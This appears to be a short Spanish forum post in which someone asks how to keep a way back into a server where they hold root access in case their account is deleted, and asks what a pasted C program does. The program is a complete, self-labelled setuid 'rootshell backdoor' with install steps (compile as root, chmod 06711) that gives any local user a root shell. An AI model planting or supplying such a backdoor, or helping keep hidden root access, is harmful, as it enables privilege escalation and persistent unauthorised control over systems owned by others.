Como podria hacer para asegurarme de poder volver a entrar a un server donde
tengo un usuario como root, por si me llegan a borrar dicho user ?





Otra pregunta... que hace este programita ?


/* This is my First attempt at coding a rootshell backdoor.
This file is really simple. It allows a user to become
root by running this file.

As root, type gcc -o door door.c
then chmod 06711 door
type exit, and dot slash door

EPiC [H3C]

*/


#include <stdio.h>
int main(void) {
setuid(0);
setgid(0);
execl("/bin/bash", "-bash", NULL);
return 0;
}


Gracias!